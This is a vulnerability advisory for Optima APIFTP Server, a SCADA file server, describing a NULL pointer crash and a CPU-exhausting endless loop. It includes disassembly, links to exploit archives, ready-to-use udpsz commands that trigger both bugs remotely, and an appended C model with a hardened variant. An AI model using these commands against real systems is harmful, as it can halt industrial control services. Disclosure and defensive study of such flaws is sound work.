#######################################################################

                             Luigi Auriemma

Application:  Optima APIFTP Server
              http://www.optimalog.com/home.html
Versions:     <= 1.5.2.13
Platforms:    Windows
Bugs:         A] NULL pointer
              B] endless loop
Exploitation: remote
Date:         13 Nov 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Optima is a suite of automation software for controlling PLCs via a
SCADA/HMI interface.
APIFTP Server is a file server for working with remote files located on
shared folders.

#######################################################################

=======
2) Bugs
=======

---------------
A] NULL pointer
---------------

NULL pointer dereference exploitable through too long path names.
The effect is the displaying of a MessageBox with the error and the
continuing of the execution, which leads to a stack exhaustion after
some seconds and the termination of the server.

---------------
B] endless loop
---------------

Endless loop with CPU at 100% caused by incomplete packets:

  004A9C93   8B03             /MOV EAX,DWORD PTR DS:[EBX]
  004A9C95   8B80 78010000    |MOV EAX,DWORD PTR DS:[EAX+178]
  004A9C9B   2D B80B0000      |SUB EAX,0BB8                  ; Switch (cases BB8..BE0)
  004A9CA0   74 19            |JE SHORT APIFTPSe.004A9CBB
  004A9CA2   83E8 14          |SUB EAX,14
  004A9CA5   74 47            |JE SHORT APIFTPSe.004A9CEE
  004A9CA7   83E8 0A          |SUB EAX,0A
  004A9CAA   0F84 9D000000    |JE APIFTPSe.004A9D4D
  004A9CB0   83E8 0A          |SUB EAX,0A
  004A9CB3   0F84 CA000000    |JE APIFTPSe.004A9D83
  004A9CB9  ^EB D8            |JMP SHORT APIFTPSe.004A9C93

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip

A]
  udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107

  wait some seconds, the tool will quit automatically

B]
  udpsz -C "e803 0400 00" -T -D SERVER 10260 -1

#######################################################################

======
4) Fix
======

No fix.

#######################################################################
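The dispatch loop behind bug B, rebuilt in C from the listing above as an added example (not code from the advisory or from the vendor): the switch at 004A9C93 has no default case, so a command field that never takes one of the four accepted values sends execution back to the top forever. The names CMD_1..CMD_4, SPIN_LIMIT and both dispatch functions are assumptions used for the model; the real code has no spin guard.

```c
#include <stdint.h>

/* Command codes recovered from the switch at 004A9C93: the value read from
 * [obj+0x178] is tested against 0xBB8, then 0xBB8+0x14, +0x0A and +0x0A. */
#define CMD_BASE 0x0BB8u
#define CMD_1    (CMD_BASE)          /* JE 004A9CBB */
#define CMD_2    (CMD_BASE + 0x14u)  /* JE 004A9CEE */
#define CMD_3    (CMD_2 + 0x0Au)     /* JE 004A9D4D */
#define CMD_4    (CMD_3 + 0x0Au)     /* JE 004A9D83 */

/* Hypothetical guard so the model terminates; the real code has none. */
#define SPIN_LIMIT 1000u

/* Returns the case number 1..4 for a recognised command, 0 otherwise. */
static int match_case(uint32_t cmd)
{
    switch (cmd) {
    case CMD_1: return 1;
    case CMD_2: return 2;
    case CMD_3: return 3;
    case CMD_4: return 4;
    default:    return 0;
    }
}

/* Model of the original dispatcher: an unmatched value reaches
 * "JMP SHORT 004A9C93" and the same, unchanged field is read again.
 * For an incomplete packet it never becomes one of the four codes,
 * so the loop never exits. Returns -1 when SPIN_LIMIT is hit. */
int dispatch_original(uint32_t cmd)
{
    for (unsigned spins = 0; spins < SPIN_LIMIT; spins++) {
        int c = match_case(cmd);
        if (c)
            return c;
        /* no default case: back to the top with the same cmd */
    }
    return -1;
}

/* Hardened dispatcher: an unrecognised command is a protocol error,
 * so the packet is rejected (-2) rather than retried. */
int dispatch_fixed(uint32_t cmd)
{
    int c = match_case(cmd);
    return c ? c : -2;
}
```

A detection angle follows from the same model: a session whose command field stays outside BB8..BE0 while the worker thread pins a core is the signature of this hang.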